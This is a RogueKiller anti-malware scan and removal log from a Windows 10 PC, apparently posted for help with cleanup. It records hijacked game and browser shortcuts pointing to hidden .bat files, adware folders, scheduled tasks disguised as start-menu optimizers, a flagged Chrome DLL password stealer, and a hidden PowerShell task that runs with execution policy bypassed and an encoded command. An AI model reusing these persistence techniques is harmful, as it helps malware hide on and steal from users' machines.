[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\G??gle Chr?me.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.emorhc.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\G?ogl? Chrome.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.emorhc.bat -> Found
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData -> Found
[PUP.Gen0][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net\?attl?.n?t.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual ten.elttab.bat -> Found
[PUP.Gen0][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\G?ogl? ?hrome.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.emorhc.bat -> Found
[PUP.Gen0][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MU LEGEND GLOBAL\?U LEGEND GLO?AL.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualzw.bat -> Found
[PUP.Gen0][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\World of Warcraft\W?rld ?f W?rcr?ft.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual tfarcraw fo dlrow.bat -> Found
[PUP.Gen0][File] C:\$RECYCLE.BIN\S-1-5-21-3446151218-491997262-3667861278-1001\$RUYU978\??th of Diablo Laun?h?r.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual olbaid fo htap.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\Desktop\Run?Sc?pe.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\Desktop\?U_L?GEND.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualzw.bat -> Found
[PUP.Gen0][File] C:\Users\Public\Desktop\G??gl? Chrom?.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.emorhc.bat -> Found
[PUP.Gen0][File] C:\Users\Public\Desktop\W?rld ?f War?r?ft.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual tfarcraw fo dlrow.bat -> Found
[PUP.Gen0][File] C:\Users\Public\Desktop\?attl?.n?t.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual ten.elttab.bat -> Found
[PUP.Gen0][File] C:\Users\Public\Desktop\?ozilla Firef??.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.xoferif.bat -> Found
[PUP.Gen0][File] C:\Users\Public\Desktop\?ath ?f Di?blo Launcher.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual olbaid fo htap.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Int?rnet ??pl?r?r.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.erolpxei.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Nexon\Vindi?tus.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual_noxen.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RuneScape\Run?Sca?e.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Run?S???e.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Found
 
¤¤¤ WMI : 0 ¤¤¤
 
¤¤¤ Hosts File : 0 ¤¤¤
 
¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤
 
¤¤¤ Web browsers : 0 ¤¤¤
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD10EZEX-60M2NA0 +++++
--- User ---
[MBR] ddaa32bb8d2d1edee03613fab80d2fe3
[BSP] a07e8b3550ee83d9c7c223cf1cd7f92c : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 953867 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK
 
+++++ PhysicalDrive1: ADATA SP610 +++++
--- User ---
[MBR] 2bf09fd3323152756de5db48f7a40a8e
[BSP] 79622432022f49b832f926bf0763e6dd : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 350 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 718848 | Size: 121302 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] ACER (0x27) [VISIBLE] Offset (sectors): 249145344 | Size: 450 MB
User = LL1 ... OK
User = LL2 ... OK
 
Delete #1
 
RogueKiller V12.11.25.0 (x64) [Nov 20 2017] (Free) by Adlice Software
 
Operating System : Windows 10 (10.0.15063) 64 bits version
Started in : Normal mode
User : Jpoch [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Delete -- Date : 11/20/2017 21:08:54 (Duration : 00:16:24)
Switches : -refid
 
¤¤¤ Processes : 0 ¤¤¤
 
¤¤¤ Registry : 4 ¤¤¤
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Internet Explorer\Main | Start Page :
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Internet Explorer\Main | Start Page :
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {5A5CBD99-8B90-47B6-8DE9-EEEFCA4ABC18} : v2.27|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=D:\vindictus\appdata\en-US\NMService.exe|Name=Nexon Messenger Core| [7] -> Deleted
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {8DA09001-13CD-4F60-A499-697A1D88A246} : v2.27|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=D:\vindictus\appdata\en-US\NMService.exe|Name=Nexon Messenger Core| [7] -> Deleted
 
¤¤¤ Tasks : 1 ¤¤¤
[PUP.Gen1] \ACC -- C:\Program Files\DriverSetupUtility\FUB\FUB_Send.bat -> Deleted
 
¤¤¤ Files : 30 ¤¤¤
[PUP.Gen0][File] C:\Users\Public\Desktop\G??gl? Chrom?.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.emorhc.bat -> Deleted
[PUP.Gen0][File] C:\Users\Public\Desktop\W?rld ?f War?r?ft.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual tfarcraw fo dlrow.bat -> Deleted
[PUP.Gen0][File] C:\Users\Public\Desktop\?attl?.n?t.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual ten.elttab.bat -> Deleted
[PUP.Gen0][File] C:\Users\Public\Desktop\?ozilla Firef??.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.xoferif.bat -> Deleted
[PUP.Gen0][File] C:\Users\Public\Desktop\?ath ?f Di?blo Launcher.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual olbaid fo htap.bat -> Deleted
[PUP.Gen0][File] C:\Users\Jpoch\Desktop\Run?Sc?pe.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Deleted
[PUP.Gen0][File] C:\Users\Jpoch\Desktop\?U_L?GEND.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualzw.bat -> Deleted
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Int?rnet ??pl?r?r.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.erolpxei.bat -> Deleted
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Nexon\Vindi?tus.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual_noxen.bat -> Deleted
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RuneScape\Run?Sca?e.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Deleted
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Run?S???e.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Deleted
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\G??gle Chr?me.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.emorhc.bat -> Deleted
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\G?ogl? Chrome.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.emorhc.bat -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-file-l1-2-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-file-l2-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-handle-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-heap-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-interlocked-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-libraryloader-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-localization-l1-2-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-memory-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-namedpipe-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-processenvironment-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-processthreads-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-processthreads-l1-1-1.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-profile-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-rtlsupport-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-string-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-synch-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-synch-l1-2-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-sysinfo-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-timezone-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-core-util-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-conio-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-convert-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-environment-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-filesystem-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-heap-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-locale-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-math-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-multibyte-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-private-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-process-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-runtime-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-stdio-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-string-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-time-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\api-ms-win-crt-utility-l1-1-0.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\d3dcompiler_47.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\msvcp120.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\msvcp140.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\msvcr120.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\ucrtbase.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\vcruntime140.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData\bin -> Deleted
[PUP.Gen0][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net\?attl?.n?t.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual ten.elttab.bat -> Deleted
[PUP.Gen0][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\G?ogl? ?hrome.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.emorhc.bat -> Deleted
[PUP.Gen0][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MU LEGEND GLOBAL\?U LEGEND GLO?AL.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualzw.bat -> Deleted
[PUP.Gen0][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\World of Warcraft\W?rld ?f W?rcr?ft.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual tfarcraw fo dlrow.bat -> Deleted
[PUP.Gen0][File] C:\$RECYCLE.BIN\S-1-5-21-3446151218-491997262-3667861278-1001\$RUYU978\??th of Diablo Laun?h?r.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual olbaid fo htap.bat -> Deleted
[PUP.Gen0][File] C:\Users\Jpoch\Desktop\Run?Sc?pe.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Removed at reboot [2]
[PUP.Gen0][File] C:\Users\Jpoch\Desktop\?U_L?GEND.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualzw.bat -> Removed at reboot [2]
[PUP.Gen0][File] C:\Users\Public\Desktop\G??gl? Chrom?.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.emorhc.bat -> Removed at reboot [2]
[PUP.Gen0][File] C:\Users\Public\Desktop\W?rld ?f War?r?ft.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual tfarcraw fo dlrow.bat -> Removed at reboot [2]
[PUP.Gen0][File] C:\Users\Public\Desktop\?attl?.n?t.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual ten.elttab.bat -> Removed at reboot [2]
[PUP.Gen0][File] C:\Users\Public\Desktop\?ozilla Firef??.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.xoferif.bat -> Removed at reboot [2]
[PUP.Gen0][File] C:\Users\Public\Desktop\?ath ?f Di?blo Launcher.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual olbaid fo htap.bat -> Removed at reboot [2]
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Int?rnet ??pl?r?r.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.erolpxei.bat -> Removed at reboot [2]
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Nexon\Vindi?tus.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual_noxen.bat -> Removed at reboot [2]
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RuneScape\Run?Sca?e.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Removed at reboot [2]
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Run?S???e.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Removed at reboot [2]
 
¤¤¤ WMI : 0 ¤¤¤
 
¤¤¤ Hosts File : 0 ¤¤¤
 
¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤
 
¤¤¤ Web browsers : 0 ¤¤¤
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD10EZEX-60M2NA0 +++++
--- User ---
[MBR] ddaa32bb8d2d1edee03613fab80d2fe3
[BSP] a07e8b3550ee83d9c7c223cf1cd7f92c : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 953867 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK
 
+++++ PhysicalDrive1: ADATA SP610 +++++
--- User ---
[MBR] 2bf09fd3323152756de5db48f7a40a8e
[BSP] 79622432022f49b832f926bf0763e6dd : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 350 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 718848 | Size: 121302 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] ACER (0x27) [VISIBLE] Offset (sectors): 249145344 | Size: 450 MB
User = LL1 ... OK
User = LL2 ... OK
 
 
Scan #2

RogueKiller V12.11.25.0 (x64) [Nov 20 2017] (Free) by Adlice Software
 
Operating System : Windows 10 (10.0.15063) 64 bits version
Started in : Normal mode
User : Jpoch [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Scan -- Date : 11/20/2017 23:51:38 (Duration : 00:18:37)
 
¤¤¤ Processes : 0 ¤¤¤
 
¤¤¤ Registry : 4 ¤¤¤
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\CSASTATS -> Found
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\PRODUCTSETUP -> Found
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\CSASTATS -> Found
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\PRODUCTSETUP -> Found
 
¤¤¤ Tasks : 7 ¤¤¤
[VT.Detected] \OPTIMIZE START MENU CACHE FILES-S-AK -- C:\Users\Jpoch\AppData\Local\9473901e0c7844098f532bfef236bee4\chipset.exe exec hide XPICSBNYDO.cmd -> Found
[VT.Detected] \OPTIMIZE START MENU CACHE FILES-S-IJ -- C:\Users\Jpoch\AppData\Local\afeada034889495fb73c9f8c3f354641\chipset.exe exec hide XZOQWMCMVN.cmd -> Found
[Suspicious.Path] \OPTIMIZE START MENU CACHE FILES-S-LR -- C:\ProgramData\6e6cc0af64b54b7891a16a888cd366e7\chipset.exe exec hide JPRLEYTJHS.cmd -> Found
[Suspicious.Path] \OPTIMIZE START MENU CACHE FILES-S-YT -- C:\ProgramData\3c405015f0eb4fae8b5f3139c2328bd8\chipset.exe exec hide QPEZNPALYH.cmd -> Found
[Adw.Optimizer] \SPACE(TITLE, T_DELAYED) -- "C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe" (-scan) -> Found
[Adw.Optimizer] \SPACE(TITLE, T_MONITOR) -- "C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe" (-Notify) -> Found
[Mal.Powershell] \{0D050A47-0404-0C0B-7E11-78057E7D117D} -- C:\WINDOWS\system32\WindowsPowershell\v1.0\powershell.exe (-nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand [base64-encoded command omitted]) -> Found
 
¤¤¤ Files : 4 ¤¤¤
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData -> Found
[PUP.Amonetize][File] C:\Users\Jpoch\AppData\Local\Temp\dd-37146-936-f9988-201d17ce4a2e4\ADVOFKIWWU.exe -> Found
[Pwd.Stealer][File] C:\Program Files (x86)\Google\Chrome\Application\winhttp.dll -> Found
[PUP.YahooPowered][File] C:\Users\Jpoch\AppData\Roaming\Mozilla\Firefox\Profiles\eggor1db.default\searchplugins\YAHOO! POWERED SEARCH.XML -> Found
 
¤¤¤ WMI : 0 ¤¤¤
 
¤¤¤ Hosts File : 0 ¤¤¤
 
¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤
 
¤¤¤ Web browsers : 0 ¤¤¤
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD10EZEX-60M2NA0 +++++
--- User ---
[MBR] ddaa32bb8d2d1edee03613fab80d2fe3
[BSP] a07e8b3550ee83d9c7c223cf1cd7f92c : Windows Vista/7/8 MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 953867 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK
 
+++++ PhysicalDrive1: ADATA SP610 +++++
--- User ---
[MBR] 2bf09fd3323152756de5db48f7a40a8e
[BSP] 79622432022f49b832f926bf0763e6dd : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 350 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 718848 | Size: 121302 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] ACER (0x27) [VISIBLE] Offset (sectors): 249145344 | Size: 450 MB
User = LL1 ... OK
User = LL2 ... OK
 
Delete #2
 
RogueKiller V12.11.25.0 (x64) [Nov 20 2017] (Free) by Adlice Software
 
Operating System : Windows 10 (10.0.15063) 64 bits version
Started in : Normal mode
User : Jpoch [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Delete -- Date : 11/20/2017 23:51:38 (Duration : 00:18:37)
 
¤¤¤ Processes : 0 ¤¤¤
 
¤¤¤ Registry : 4 ¤¤¤
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\CSASTATS -> Deleted
[PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\PRODUCTSETUP -> Deleted
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\CSASTATS -> Deleted
[PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\PRODUCTSETUP -> Deleted
 
¤¤¤ Tasks : 7 ¤¤¤
[VT.Detected] \OPTIMIZE START MENU CACHE FILES-S-AK -- C:\Users\Jpoch\AppData\Local\9473901e0c7844098f532bfef236bee4\chipset.exe exec hide XPICSBNYDO.cmd -> Deleted
[VT.Detected] \OPTIMIZE START MENU CACHE FILES-S-IJ -- C:\Users\Jpoch\AppData\Local\afeada034889495fb73c9f8c3f354641\chipset.exe exec hide XZOQWMCMVN.cmd -> Deleted
[Suspicious.Path] \OPTIMIZE START MENU CACHE FILES-S-LR -- C:\ProgramData\6e6cc0af64b54b7891a16a888cd366e7\chipset.exe exec hide JPRLEYTJHS.cmd -> Deleted
[Suspicious.Path] \OPTIMIZE START MENU CACHE FILES-S-YT -- C:\ProgramData\3c405015f0eb4fae8b5f3139c2328bd8\chipset.exe exec hide QPEZNPALYH.cmd -> Deleted
[Adw.Optimizer] \SPACE(TITLE, T_DELAYED) -- "C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe" (-scan) -> Deleted
[Adw.Optimizer] \SPACE(TITLE, T_MONITOR) -- "C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe" (-Notify) -> Deleted
[Mal.Powershell] \{0D050A47-0404-0C0B-7E11-78057E7D117D} -- C:\WINDOWS\system32\WindowsPowershell\v1.0\powershell.exe (-nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand [base64-encoded command omitted]) -> Deleted
 
¤¤¤ Files : 4 ¤¤¤
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\add.json -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\add.json -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\AGLoader.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\AnonymizerGadget.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\AnonymizerGadget.zip -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\AnonymizerLauncher.exe -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\bearer\qgenericbearer.dll -> Deleted
[PUP.OnlineIO|PUP.Gen1][File] C:\Users\Jpoch\AppData\Roaming\AGData\bin\bearer\qnativewifibearer.dll -> Deleted
